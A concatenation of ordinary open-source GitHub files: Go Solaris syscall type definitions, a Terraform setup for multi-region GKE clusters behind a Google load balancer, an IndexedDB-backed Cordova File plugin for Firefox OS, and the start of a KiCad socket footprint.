Mode uint32
Nlink uint32
Uid uint32
Gid uint32
Rdev uint64
Size int64
Atim Timespec
Mtim Timespec
Ctim Timespec
Blksize int32
_ [4]byte
Blocks int64
Fstype [16]int8
}
type Flock_t struct {
Type int16
Whence int16
_ [4]byte
Start int64
Len int64
Sysid int32
Pid int32
Pad [4]int64
}
type Dirent struct {
Ino uint64
Off int64
Reclen uint16
Name [1]int8
_ [5]byte
}
type _Fsblkcnt_t uint64
type Statvfs_t struct {
Bsize uint64
Frsize uint64
Blocks uint64
Bfree uint64
Bavail uint64
Files uint64
Ffree uint64
Favail uint64
Fsid uint64
Basetype [16]int8
Flag uint64
Namemax uint64
Fstr [32]int8
}
type RawSockaddrInet4 struct {
Family uint16
Port uint16
Addr [4]byte /* in_addr */
Zero [8]int8
}
type RawSockaddrInet6 struct {
Family uint16
Port uint16
Flowinfo uint32
Addr [16]byte /* in6_addr */
Scope_id uint32
X__sin6_src_id uint32
}
type RawSockaddrUnix struct {
Family uint16
Path [108]int8
}
type RawSockaddrDatalink struct {
Family uint16
Index uint16
Type uint8
Nlen uint8
Alen uint8
Slen uint8
Data [244]int8
}
type RawSockaddr struct {
Family uint16
Data [14]int8
}
type RawSockaddrAny struct {
Addr RawSockaddr
Pad [236]int8
}
type _Socklen uint32
type Linger struct {
Onoff int32
Linger int32
}
type Iovec struct {
Base *int8
Len uint64
}
type IPMreq struct {
Multiaddr [4]byte /* in_addr */
Interface [4]byte /* in_addr */
}
type IPv6Mreq struct {
Multiaddr [16]byte /* in6_addr */
Interface uint32
}
type Msghdr struct {
Name *byte
Namelen uint32
_ [4]byte
Iov *Iovec
Iovlen int32
_ [4]byte
Accrights *int8
Accrightslen int32
_ [4]byte
}
type Cmsghdr struct {
Len uint32
Level int32
Type int32
}
type Inet4Pktinfo struct {
Ifindex uint32
Spec_dst [4]byte /* in_addr */
Addr [4]byte /* in_addr */
}
type Inet6Pktinfo struct {
Addr [16]byte /* in6_addr */
Ifindex uint32
}
type IPv6MTUInfo struct {
Addr RawSockaddrInet6
Mtu uint32
}
type ICMPv6Filter struct {
X__icmp6_filt [8]uint32
}
const (
SizeofSockaddrInet4 = 0x10
SizeofSockaddrInet6 = 0x20
SizeofSockaddrAny = 0xfc
SizeofSockaddrUnix = 0x6e
SizeofSockaddrDatalink = 0xfc
SizeofLinger = 0x8
SizeofIPMreq = 0x8
SizeofIPv6Mreq = 0x14
SizeofMsghdr = 0x30
SizeofCmsghdr = 0xc
SizeofInet4Pktinfo = 0xc
SizeofInet6Pktinfo = 0x14
SizeofIPv6MTUInfo = 0x24
SizeofICMPv6Filter = 0x20
)
type FdSet struct {
Bits [1024]int64
}
type Utsname struct {
Sysname [257]byte
Nodename [257]byte
Release [257]byte
Version [257]byte
Machine [257]byte
}
type Ustat_t struct {
Tfree int64
Tinode uint64
Fname [6]int8
Fpack [6]int8
_ [4]byte
}
const (
AT_FDCWD = 0xffd19553
AT_SYMLINK_NOFOLLOW = 0x1000
AT_SYMLINK_FOLLOW = 0x2000
AT_REMOVEDIR = 0x1
AT_EACCESS = 0x4
)
const (
SizeofIfMsghdr = 0x54
SizeofIfData = 0x44
SizeofIfaMsghdr = 0x14
SizeofRtMsghdr = 0x4c
SizeofRtMetrics = 0x28
)
type IfMsghdr struct {
Msglen uint16
Version uint8
Type uint8
Addrs int32
Flags int32
Index uint16
_ [2]byte
Data IfData
}
type IfData struct {
Type uint8
Addrlen uint8
Hdrlen uint8
_ [1]byte
Mtu uint32
Metric uint32
Baudrate uint32
Ipackets uint32
Ierrors uint32
Opackets uint32
Oerrors uint32
Collisions uint32
Ibytes uint32
Obytes uint32
Imcasts uint32
Omcasts uint32
Iqdrops uint32
Noproto uint32
Lastchange Timeval32
}
type IfaMsghdr struct {
Msglen uint16
Version uint8
Type uint8
Addrs int32
Flags int32
Index uint16
_ [2]byte
Metric int32
}
type RtMsghdr struct {
Msglen uint16
Version uint8
Type uint8
Index uint16
_ [2]byte
Flags int32
Addrs int32
Pid int32
Seq int32
Errno int32
Use int32
Inits uint32
Rmx RtMetrics
}
type RtMetrics struct {
Locks uint32
Mtu uint32
Hopcount uint32
Expire uint32
Recvpipe uint32
Sendpipe uint32
Ssthresh uint32
Rtt uint32
Rttvar uint32
Pksent uint32
}
const (
SizeofBpfVersion = 0x4
SizeofBpfStat = 0x80
SizeofBpfProgram = 0x10
SizeofBpfInsn = 0x8
SizeofBpfHdr = 0x14
)
type BpfVersion struct {
Major uint16
Minor uint16
}
type BpfStat struct {
Recv uint64
Drop uint64
Capt uint64
Padding [13]uint64
}
type BpfProgram struct {
Len uint32
_ [4]byte
Insns *BpfInsn
}
type BpfInsn struct {
Code uint16
Jt uint8
Jf uint8
K uint32
}
type BpfTimeval struct {
Sec int32
Usec int32
}
type BpfHdr struct {
Tstamp BpfTimeval
Caplen uint32
Datalen uint32
Hdrlen uint16
_ [2]byte
}
type Termios struct {
Iflag uint32
Oflag uint32
Cflag uint32
Lflag uint32
Cc [19]uint8
_ [1]byte
}
type Termio struct {
Iflag uint16
Oflag uint16
Cflag uint16
Lflag uint16
Line int8
Cc [8]uint8
_ [1]byte
}
type Winsize struct {
Row uint16
Col uint16
Xpixel uint16
Ypixel uint16
}
type PollFd struct {
Fd int32
Events int16
Revents int16
}
const (
POLLERR = 0x8
POLLHUP = 0x10
POLLIN = 0x1
POLLNVAL = 0x20
POLLOUT = 0x4
POLLPRI = 0x2
POLLRDBAND = 0x80
POLLRDNORM = 0x40
POLLWRBAND = 0x100
POLLWRNORM = 0x4
)
|
{
"pile_set_name": "Github"
}
|
variable "region1_cluster_name" {
default = "tf-region1"
}
variable "region2_cluster_name" {
default = "tf-region2"
}
variable "region1" {
default = "us-west1"
}
variable "region2" {
default = "us-east4"
}
variable "network_name" {
default = "tf-gke-multi-region"
}
provider "google" {
region = "${var.region1}"
}
data "google_client_config" "current" {}
resource "google_compute_network" "default" {
name = "${var.network_name}"
auto_create_subnetworks = false
}
resource "google_compute_subnetwork" "region1" {
name = "${var.network_name}"
ip_cidr_range = "10.126.0.0/20"
network = "${google_compute_network.default.self_link}"
region = "${var.region1}"
}
resource "google_compute_subnetwork" "region2" {
name = "${var.network_name}"
ip_cidr_range = "10.127.0.0/20"
network = "${google_compute_network.default.self_link}"
region = "${var.region2}"
}
module "cluster1" {
source = "./gke-regional"
region = "${var.region1}"
cluster_name = "${var.region1_cluster_name}"
tags = ["tf-gke-region1"]
network = "${google_compute_subnetwork.region1.network}"
subnetwork = "${google_compute_subnetwork.region1.name}"
}
module "cluster2" {
source = "./gke-regional"
region = "${var.region2}"
cluster_name = "${var.region2_cluster_name}"
tags = ["tf-gke-region2"]
network = "${google_compute_subnetwork.region2.network}"
subnetwork = "${google_compute_subnetwork.region2.name}"
}
provider "kubernetes" {
alias = "cluster1"
host = "${module.cluster1.endpoint}"
token = "${data.google_client_config.current.access_token}"
client_certificate = "${base64decode(module.cluster1.client_certificate)}"
client_key = "${base64decode(module.cluster1.client_key)}"
cluster_ca_certificate = "${base64decode(module.cluster1.cluster_ca_certificate)}"
}
provider "kubernetes" {
alias = "cluster2"
host = "${module.cluster2.endpoint}"
token = "${data.google_client_config.current.access_token}"
client_certificate = "${base64decode(module.cluster2.client_certificate)}"
client_key = "${base64decode(module.cluster2.client_key)}"
cluster_ca_certificate = "${base64decode(module.cluster2.cluster_ca_certificate)}"
}
module "cluster1_app" {
source = "./k8s-app"
external_ip = "${module.glb.external_ip}"
node_port = 30000
providers = {
kubernetes = "kubernetes.cluster1"
}
}
module "cluster2_app" {
source = "./k8s-app"
external_ip = "${module.glb.external_ip}"
node_port = 30000
providers = {
kubernetes = "kubernetes.cluster2"
}
}
module "glb" {
source = "GoogleCloudPlatform/lb-http/google"
version = "1.0.10"
name = "gke-multi-regional"
target_tags = ["tf-gke-region1", "tf-gke-region2"]
firewall_networks = ["${google_compute_network.default.name}"]
backends = {
"0" = [
{
group = "${element(module.cluster1.instance_groups, 0)}"
},
{
group = "${element(module.cluster1.instance_groups, 1)}"
},
{
group = "${element(module.cluster1.instance_groups, 2)}"
},
{
group = "${element(module.cluster2.instance_groups, 0)}"
},
{
group = "${element(module.cluster2.instance_groups, 1)}"
},
{
group = "${element(module.cluster2.instance_groups, 2)}"
},
]
}
backend_params = [
// health check path, port name, port number, timeout seconds.
"/,http,30000,10",
]
}
module "cluster1_named_port_1" {
source = "github.com/danisla/terraform-google-named-ports"
instance_group = "${element(module.cluster1.instance_groups, 0)}"
name = "http"
port = "30000"
}
module "cluster1_named_port_2" {
source = "github.com/danisla/terraform-google-named-ports"
instance_group = "${element(module.cluster1.instance_groups, 1)}"
name = "http"
port = "30000"
}
module "cluster1_named_port_3" {
source = "github.com/danisla/terraform-google-named-ports"
instance_group = "${element(module.cluster1.instance_groups, 2)}"
name = "http"
port = "30000"
}
module "cluster2_named_port_1" {
source = "github.com/danisla/terraform-google-named-ports"
instance_group = "${element(module.cluster2.instance_groups, 0)}"
name = "http"
port = "30000"
}
module "cluster2_named_port_2" {
source = "github.com/danisla/terraform-google-named-ports"
instance_group = "${element(module.cluster2.instance_groups, 1)}"
name = "http"
port = "30000"
}
module "cluster2_named_port_3" {
source = "github.com/danisla/terraform-google-named-ports"
instance_group = "${element(module.cluster2.instance_groups, 2)}"
name = "http"
port = "30000"
}
output "cluster1-name" {
value = "${var.region1_cluster_name}"
}
output "cluster2-name" {
value = "${var.region2_cluster_name}"
}
output "cluster1-region" {
value = "${var.region1}"
}
output "cluster2-region" {
value = "${var.region2}"
}
output "load-balancer-ip" {
value = "${module.glb.external_ip}"
}
|
{
"pile_set_name": "Github"
}
|
/*
*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*/
/* global IDBKeyRange */
var LocalFileSystem = require('./LocalFileSystem'),
FileSystem = require('./FileSystem'),
FileEntry = require('./FileEntry'),
FileError = require('./FileError'),
DirectoryEntry = require('./DirectoryEntry'),
File = require('./File');
/*
QUIRKS:
Does not fail when removing non-empty directories
Does not support metadata for directories
Does not support requestAllFileSystems
Does not support resolveLocalFileSystemURI
Methods copyTo and moveTo do not support directories
Heavily based on https://github.com/ebidel/idb.filesystem.js
*/
(function(exports, global) {
var indexedDB = global.indexedDB || global.mozIndexedDB;
if (!indexedDB) {
throw "Firefox OS File plugin: indexedDB not supported";
}
var fs_ = null;
var idb_ = {};
idb_.db = null;
var FILE_STORE_ = 'entries';
var DIR_SEPARATOR = '/';
var DIR_OPEN_BOUND = String.fromCharCode(DIR_SEPARATOR.charCodeAt(0) + 1);
var pathsPrefix = {
// Read-only directory where the application is installed.
applicationDirectory: location.origin + "/",
// Where to put app-specific data files.
dataDirectory: 'file:///persistent/',
// Cached files that should survive app restarts.
// Apps should not rely on the OS to delete files in here.
cacheDirectory: 'file:///temporary/',
};
/*** Exported functionality ***/
exports.requestFileSystem = function(successCallback, errorCallback, args) {
var type = args[0];
//var size = args[1];
if (type !== LocalFileSystem.TEMPORARY && type !== LocalFileSystem.PERSISTENT) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var name = type === LocalFileSystem.TEMPORARY ? 'temporary' : 'persistent';
var storageName = (location.protocol + location.host).replace(/:/g, '_');
var root = new DirectoryEntry('', DIR_SEPARATOR);
fs_ = new FileSystem(name, root);
idb_.open(storageName, function() {
successCallback(fs_);
}, errorCallback);
};
require('./fileSystems').getFs = function(name, callback) {
callback(new FileSystem(name, fs_.root));
};
// list a directory's contents (files and folders).
exports.readEntries = function(successCallback, errorCallback, args) {
var fullPath = args[0];
if (!successCallback) {
throw Error('Expected successCallback argument.');
}
var path = resolveToFullPath_(fullPath);
idb_.getAllEntries(path.fullPath, path.storagePath, function(entries) {
successCallback(entries);
}, errorCallback);
};
exports.getFile = function(successCallback, errorCallback, args) {
var fullPath = args[0];
var path = args[1];
var options = args[2] || {};
// Create an absolute path if we were handed a relative one.
path = resolveToFullPath_(fullPath, path);
idb_.get(path.storagePath, function(fileEntry) {
if (options.create === true && options.exclusive === true && fileEntry) {
// If create and exclusive are both true, and the path already exists,
// getFile must fail.
if (errorCallback) {
errorCallback(FileError.PATH_EXISTS_ERR);
}
} else if (options.create === true && !fileEntry) {
// If create is true, the path doesn't exist, and no other error occurs,
// getFile must create it as a zero-length file and return a corresponding
// FileEntry.
var newFileEntry = new FileEntry(path.fileName, path.fullPath, new FileSystem(path.fsName, fs_.root));
newFileEntry.file_ = new MyFile({
size: 0,
name: newFileEntry.name,
lastModifiedDate: new Date(),
storagePath: path.storagePath
});
idb_.put(newFileEntry, path.storagePath, successCallback, errorCallback);
} else if (options.create === true && fileEntry) {
if (fileEntry.isFile) {
// Overwrite file, delete then create new.
idb_['delete'](path.storagePath, function() {
var newFileEntry = new FileEntry(path.fileName, path.fullPath, new FileSystem(path.fsName, fs_.root));
newFileEntry.file_ = new MyFile({
size: 0,
name: newFileEntry.name,
lastModifiedDate: new Date(),
storagePath: path.storagePath
});
idb_.put(newFileEntry, path.storagePath, successCallback, errorCallback);
}, errorCallback);
} else {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
}
} else if ((!options.create || options.create === false) && !fileEntry) {
// If create is not true and the path doesn't exist, getFile must fail.
if (errorCallback) {
errorCallback(FileError.NOT_FOUND_ERR);
}
} else if ((!options.create || options.create === false) && fileEntry &&
fileEntry.isDirectory) {
// If create is not true and the path exists, but is a directory, getFile
// must fail.
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
} else {
// Otherwise, if no other error occurs, getFile must return a FileEntry
// corresponding to path.
successCallback(fileEntryFromIdbEntry(fileEntry));
}
}, errorCallback);
};
exports.getFileMetadata = function(successCallback, errorCallback, args) {
var fullPath = args[0];
exports.getFile(function(fileEntry) {
successCallback(new File(fileEntry.file_.name, fileEntry.fullPath, '', fileEntry.file_.lastModifiedDate,
fileEntry.file_.size));
}, errorCallback, [fullPath, null]);
};
exports.getMetadata = function(successCallback, errorCallback, args) {
exports.getFile(function (fileEntry) {
successCallback(
{
modificationTime: fileEntry.file_.lastModifiedDate,
size: fileEntry.file_.lastModifiedDate
});
}, errorCallback, args);
};
exports.setMetadata = function(successCallback, errorCallback, args) {
var fullPath = args[0];
var metadataObject = args[1];
exports.getFile(function (fileEntry) {
fileEntry.file_.lastModifiedDate = metadataObject.modificationTime;
}, errorCallback, [fullPath, null]);
};
exports.write = function(successCallback, errorCallback, args) {
var fileName = args[0],
data = args[1],
position = args[2];
//isBinary = args[3];
if (!data) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
exports.getFile(function(fileEntry) {
var blob_ = fileEntry.file_.blob_;
if (!blob_) {
blob_ = new Blob([data], {type: data.type});
} else {
// Calc the head and tail fragments
var head = blob_.slice(0, position);
var tail = blob_.slice(position + data.byteLength);
// Calc the padding
var padding = position - head.size;
if (padding < 0) {
padding = 0;
}
// Do the "write". In fact, a full overwrite of the Blob.
blob_ = new Blob([head, new Uint8Array(padding), data, tail],
{type: data.type});
}
// Set the blob we're writing on this file entry so we can recall it later.
fileEntry.file_.blob_ = blob_;
fileEntry.file_.lastModifiedDate = data.lastModifiedDate || null;
fileEntry.file_.size = blob_.size;
fileEntry.file_.name = blob_.name;
fileEntry.file_.type = blob_.type;
idb_.put(fileEntry, fileEntry.file_.storagePath, function() {
successCallback(data.byteLength);
}, errorCallback);
}, errorCallback, [fileName, null]);
};
exports.readAsText = function(successCallback, errorCallback, args) {
var fileName = args[0],
enc = args[1],
startPos = args[2],
endPos = args[3];
readAs('text', fileName, enc, startPos, endPos, successCallback, errorCallback);
};
exports.readAsDataURL = function(successCallback, errorCallback, args) {
var fileName = args[0],
startPos = args[1],
endPos = args[2];
readAs('dataURL', fileName, null, startPos, endPos, successCallback, errorCallback);
};
exports.readAsBinaryString = function(successCallback, errorCallback, args) {
var fileName = args[0],
startPos = args[1],
endPos = args[2];
readAs('binaryString', fileName, null, startPos, endPos, successCallback, errorCallback);
};
exports.readAsArrayBuffer = function(successCallback, errorCallback, args) {
var fileName = args[0],
startPos = args[1],
endPos = args[2];
readAs('arrayBuffer', fileName, null, startPos, endPos, successCallback, errorCallback);
};
exports.removeRecursively = exports.remove = function(successCallback, errorCallback, args) {
var fullPath = args[0];
// TODO: This doesn't protect against directories that have content in it.
// Should throw an error instead if the dirEntry is not empty.
idb_['delete'](fullPath, function() {
successCallback();
}, errorCallback);
};
exports.getDirectory = function(successCallback, errorCallback, args) {
var fullPath = args[0];
var path = args[1];
var options = args[2];
// Create an absolute path if we were handed a relative one.
path = resolveToFullPath_(fullPath, path);
idb_.get(path.storagePath, function(folderEntry) {
if (!options) {
options = {};
}
if (options.create === true && options.exclusive === true && folderEntry) {
// If create and exclusive are both true, and the path already exists,
// getDirectory must fail.
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
} else if (options.create === true && !folderEntry) {
// If create is true, the path doesn't exist, and no other error occurs,
// getDirectory must create it as a zero-length file and return a corresponding
// MyDirectoryEntry.
var dirEntry = new DirectoryEntry(path.fileName, path.fullPath, new FileSystem(path.fsName, fs_.root));
idb_.put(dirEntry, path.storagePath, successCallback, errorCallback);
} else if (options.create === true && folderEntry) {
if (folderEntry.isDirectory) {
// IDB won't save methods, so we need re-create the MyDirectoryEntry.
successCallback(new DirectoryEntry(folderEntry.name, folderEntry.fullPath, folderEntry.fileSystem));
} else {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
}
} else if ((!options.create || options.create === false) && !folderEntry) {
// Handle root special. It should always exist.
if (path.fullPath === DIR_SEPARATOR) {
successCallback(fs_.root);
return;
}
// If create is not true and the path doesn't exist, getDirectory must fail.
if (errorCallback) {
errorCallback(FileError.NOT_FOUND_ERR);
}
} else if ((!options.create || options.create === false) && folderEntry &&
folderEntry.isFile) {
// If create is not true and the path exists, but is a file, getDirectory
// must fail.
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
} else {
// Otherwise, if no other error occurs, getDirectory must return a
// MyDirectoryEntry corresponding to path.
// IDB won't' save methods, so we need re-create MyDirectoryEntry.
successCallback(new DirectoryEntry(folderEntry.name, folderEntry.fullPath, folderEntry.fileSystem));
}
}, errorCallback);
};
exports.getParent = function(successCallback, errorCallback, args) {
var fullPath = args[0];
if (fullPath === DIR_SEPARATOR) {
successCallback(fs_.root);
return;
}
var pathArr = fullPath.split(DIR_SEPARATOR);
pathArr.pop();
var namesa = pathArr.pop();
var path = pathArr.join(DIR_SEPARATOR);
exports.getDirectory(successCallback, errorCallback, [path, namesa, {create: false}]);
};
exports.copyTo = function(successCallback, errorCallback, args) {
var srcPath = args[0];
var parentFullPath = args[1];
var name = args[2];
// Read src file
exports.getFile(function(srcFileEntry) {
// Create dest file
exports.getFile(function(dstFileEntry) {
exports.write(function() {
successCallback(dstFileEntry);
}, errorCallback, [dstFileEntry.file_.storagePath, srcFileEntry.file_.blob_, 0]);
}, errorCallback, [parentFullPath, name, {create: true}]);
}, errorCallback, [srcPath, null]);
};
exports.moveTo = function(successCallback, errorCallback, args) {
var srcPath = args[0];
//var parentFullPath = args[1];
//var name = args[2];
exports.copyTo(function (fileEntry) {
exports.remove(function () {
successCallback(fileEntry);
}, errorCallback, [srcPath]);
}, errorCallback, args);
};
exports.resolveLocalFileSystemURI = function(successCallback, errorCallback, args) {
var path = args[0];
// Ignore parameters
if (path.indexOf('?') !== -1) {
path = String(path).split("?")[0];
}
// support for encodeURI
if (/\%5/g.test(path)) {
path = decodeURI(path);
}
if (path.indexOf(pathsPrefix.dataDirectory) === 0) {
path = path.substring(pathsPrefix.dataDirectory.length - 1);
exports.requestFileSystem(function(fs) {
fs.root.getFile(path, {create: false}, successCallback, function() {
fs.root.getDirectory(path, {create: false}, successCallback, errorCallback);
});
}, errorCallback, [LocalFileSystem.PERSISTENT]);
} else if (path.indexOf(pathsPrefix.cacheDirectory) === 0) {
path = path.substring(pathsPrefix.cacheDirectory.length - 1);
exports.requestFileSystem(function(fs) {
fs.root.getFile(path, {create: false}, successCallback, function() {
fs.root.getDirectory(path, {create: false}, successCallback, errorCallback);
});
}, errorCallback, [LocalFileSystem.TEMPORARY]);
} else if (path.indexOf(pathsPrefix.applicationDirectory) === 0) {
path = path.substring(pathsPrefix.applicationDirectory.length);
var xhr = new XMLHttpRequest();
xhr.open("GET", path, true);
xhr.onreadystatechange = function () {
if (xhr.status === 200 && xhr.readyState === 4) {
exports.requestFileSystem(function(fs) {
fs.name = location.hostname;
fs.root.getFile(path, {create: true}, writeFile, errorCallback);
}, errorCallback, [LocalFileSystem.PERSISTENT]);
}
};
xhr.onerror = function () {
if (errorCallback) {
errorCallback(FileError.NOT_READABLE_ERR);
}
};
xhr.send();
} else {
if (errorCallback) {
errorCallback(FileError.NOT_FOUND_ERR);
}
}
function writeFile(entry) {
entry.createWriter(function (fileWriter) {
fileWriter.onwriteend = function (evt) {
if (!evt.target.error) {
entry.filesystemName = location.hostname;
successCallback(entry);
}
};
fileWriter.onerror = function () {
if (errorCallback) {
errorCallback(FileError.NOT_READABLE_ERR);
}
};
fileWriter.write(new Blob([xhr.response]));
}, errorCallback);
}
};
exports.requestAllPaths = function(successCallback) {
successCallback(pathsPrefix);
};
/*** Helpers ***/
/**
* Interface to wrap the native File interface.
*
* This interface is necessary for creating zero-length (empty) files,
* something the Filesystem API allows you to do. Unfortunately, File's
* constructor cannot be called directly, making it impossible to instantiate
* an empty File in JS.
*
* @param {Object} opts Initial values.
* @constructor
*/
function MyFile(opts) {
var blob_ = new Blob();
this.size = opts.size || 0;
this.name = opts.name || '';
this.type = opts.type || '';
this.lastModifiedDate = opts.lastModifiedDate || null;
this.storagePath = opts.storagePath || '';
// Need some black magic to correct the object's size/name/type based on the
// blob that is saved.
Object.defineProperty(this, 'blob_', {
enumerable: true,
get: function() {
return blob_;
},
set: function(val) {
blob_ = val;
this.size = blob_.size;
this.name = blob_.name;
this.type = blob_.type;
this.lastModifiedDate = blob_.lastModifiedDate;
}.bind(this)
});
}
MyFile.prototype.constructor = MyFile;
// When saving an entry, the fullPath should always lead with a slash and never
// end with one (e.g. a directory). Also, resolve '.' and '..' to an absolute
// one. This method ensures path is legit!
function resolveToFullPath_(cwdFullPath, path) {
path = path || '';
var fullPath = path;
var prefix = '';
cwdFullPath = cwdFullPath || DIR_SEPARATOR;
if (cwdFullPath.indexOf(FILESYSTEM_PREFIX) === 0) {
prefix = cwdFullPath.substring(0, cwdFullPath.indexOf(DIR_SEPARATOR, FILESYSTEM_PREFIX.length));
cwdFullPath = cwdFullPath.substring(cwdFullPath.indexOf(DIR_SEPARATOR, FILESYSTEM_PREFIX.length));
}
var relativePath = path[0] !== DIR_SEPARATOR;
if (relativePath) {
fullPath = cwdFullPath;
if (cwdFullPath != DIR_SEPARATOR) {
fullPath += DIR_SEPARATOR + path;
} else {
fullPath += path;
}
}
// Adjust '..'s by removing parent directories when '..' flows in path.
var parts = fullPath.split(DIR_SEPARATOR);
for (var i = 0; i < parts.length; ++i) {
var part = parts[i];
if (part == '..') {
parts[i - 1] = '';
parts[i] = '';
}
}
fullPath = parts.filter(function(el) {
return el;
}).join(DIR_SEPARATOR);
// Add back in leading slash.
if (fullPath[0] !== DIR_SEPARATOR) {
fullPath = DIR_SEPARATOR + fullPath;
}
// Replace './' by current dir. ('./one/./two' -> one/two)
fullPath = fullPath.replace(/\.\//g, DIR_SEPARATOR);
// Replace '//' with '/'.
fullPath = fullPath.replace(/\/\//g, DIR_SEPARATOR);
// Replace '/.' with '/'.
fullPath = fullPath.replace(/\/\./g, DIR_SEPARATOR);
// Remove '/' if it appears on the end.
if (fullPath[fullPath.length - 1] == DIR_SEPARATOR &&
fullPath != DIR_SEPARATOR) {
fullPath = fullPath.substring(0, fullPath.length - 1);
}
return {
storagePath: prefix + fullPath,
fullPath: fullPath,
fileName: fullPath.split(DIR_SEPARATOR).pop(),
fsName: prefix.split(DIR_SEPARATOR).pop()
};
}
function fileEntryFromIdbEntry(fileEntry) {
// IDB won't save methods, so we need re-create the FileEntry.
var clonedFileEntry = new FileEntry(fileEntry.name, fileEntry.fullPath, fileEntry.fileSystem);
clonedFileEntry.file_ = fileEntry.file_;
return clonedFileEntry;
}
function readAs(what, fullPath, encoding, startPos, endPos, successCallback, errorCallback) {
exports.getFile(function(fileEntry) {
var fileReader = new FileReader(),
blob = fileEntry.file_.blob_.slice(startPos, endPos);
fileReader.onload = function(e) {
successCallback(e.target.result);
};
fileReader.onerror = errorCallback;
switch (what) {
case 'text':
fileReader.readAsText(blob, encoding);
break;
case 'dataURL':
fileReader.readAsDataURL(blob);
break;
case 'arrayBuffer':
fileReader.readAsArrayBuffer(blob);
break;
case 'binaryString':
fileReader.readAsBinaryString(blob);
break;
}
}, errorCallback, [fullPath, null]);
}
/*** Core logic to handle IDB operations ***/
idb_.open = function(dbName, successCallback, errorCallback) {
var self = this;
// TODO: FF 12.0a1 isn't liking a db name with : in it.
var request = indexedDB.open(dbName.replace(':', '_')/*, 1 /*version*/);
request.onerror = errorCallback || onError;
request.onupgradeneeded = function(e) {
// First open was called or higher db version was used.
// console.log('onupgradeneeded: oldVersion:' + e.oldVersion,
// 'newVersion:' + e.newVersion);
self.db = e.target.result;
self.db.onerror = onError;
if (!self.db.objectStoreNames.contains(FILE_STORE_)) {
self.db.createObjectStore(FILE_STORE_/*,{keyPath: 'id', autoIncrement: true}*/);
}
};
request.onsuccess = function(e) {
self.db = e.target.result;
self.db.onerror = onError;
successCallback(e);
};
request.onblocked = errorCallback || onError;
};
idb_.close = function() {
this.db.close();
this.db = null;
};
idb_.get = function(fullPath, successCallback, errorCallback) {
if (!this.db) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var tx = this.db.transaction([FILE_STORE_], 'readonly');
//var request = tx.objectStore(FILE_STORE_).get(fullPath);
var range = IDBKeyRange.bound(fullPath, fullPath + DIR_OPEN_BOUND,
false, true);
var request = tx.objectStore(FILE_STORE_).get(range);
tx.onabort = errorCallback || onError;
tx.oncomplete = function(e) {
successCallback(request.result);
};
};
idb_.getAllEntries = function(fullPath, storagePath, successCallback, errorCallback) {
if (!this.db) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var results = [];
if (storagePath[storagePath.length - 1] === DIR_SEPARATOR) {
storagePath = storagePath.substring(0, storagePath.length - 1);
}
var range = IDBKeyRange.bound(
storagePath + DIR_SEPARATOR, storagePath + DIR_OPEN_BOUND, false, true);
var tx = this.db.transaction([FILE_STORE_], 'readonly');
tx.onabort = errorCallback || onError;
tx.oncomplete = function(e) {
results = results.filter(function(val) {
var valPartsLen = val.fullPath.split(DIR_SEPARATOR).length;
var fullPathPartsLen = fullPath.split(DIR_SEPARATOR).length;
if (fullPath === DIR_SEPARATOR && valPartsLen < fullPathPartsLen + 1) {
// Hack to filter out entries in the root folder. This is inefficient
// because reading the entires of fs.root (e.g. '/') returns ALL
// results in the database, then filters out the entries not in '/'.
return val;
} else if (fullPath !== DIR_SEPARATOR &&
valPartsLen === fullPathPartsLen + 1) {
// If this a subfolder and entry is a direct child, include it in
// the results. Otherwise, it's not an entry of this folder.
return val;
}
});
successCallback(results);
};
var request = tx.objectStore(FILE_STORE_).openCursor(range);
request.onsuccess = function(e) {
var cursor = e.target.result;
if (cursor) {
var val = cursor.value;
results.push(val.isFile ? fileEntryFromIdbEntry(val) : new DirectoryEntry(val.name, val.fullPath, val.fileSystem));
cursor['continue']();
}
};
};
idb_['delete'] = function(fullPath, successCallback, errorCallback) {
if (!this.db) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var tx = this.db.transaction([FILE_STORE_], 'readwrite');
tx.oncomplete = successCallback;
tx.onabort = errorCallback || onError;
//var request = tx.objectStore(FILE_STORE_).delete(fullPath);
var range = IDBKeyRange.bound(
fullPath, fullPath + DIR_OPEN_BOUND, false, true);
tx.objectStore(FILE_STORE_)['delete'](range);
};
idb_.put = function(entry, storagePath, successCallback, errorCallback) {
if (!this.db) {
if (errorCallback) {
errorCallback(FileError.INVALID_MODIFICATION_ERR);
}
return;
}
var tx = this.db.transaction([FILE_STORE_], 'readwrite');
tx.onabort = errorCallback || onError;
tx.oncomplete = function(e) {
// TODO: Error is thrown if we pass the request event back instead.
successCallback(entry);
};
tx.objectStore(FILE_STORE_).put(entry, storagePath);
};
// Global error handler. Errors bubble from request, to transaction, to db.
function onError(e) {
switch (e.target.errorCode) {
case 12:
console.log('Error - Attempt to open db with a lower version than the ' +
'current one.');
break;
default:
console.log('errorCode: ' + e.target.errorCode);
}
console.log(e, e.code, e.message);
}
// Clean up.
// TODO: Is there a place for this?
// global.addEventListener('beforeunload', function(e) {
// idb_.db && idb_.db.close();
// }, false);
})(module.exports, window);
require("cordova/exec/proxy").add("File", module.exports);
|
{
"pile_set_name": "Github"
}
|
(module PinSocket_2x11_P1.27mm_Vertical (layer F.Cu) (tedit 5A19A422)
(descr "Through hole straight socket strip, 2x11, 1.27mm pitch, double cols (from Kicad 4.0.7), script generated")
(tags "Through hole socket strip THT 2x11 1.27mm double row")
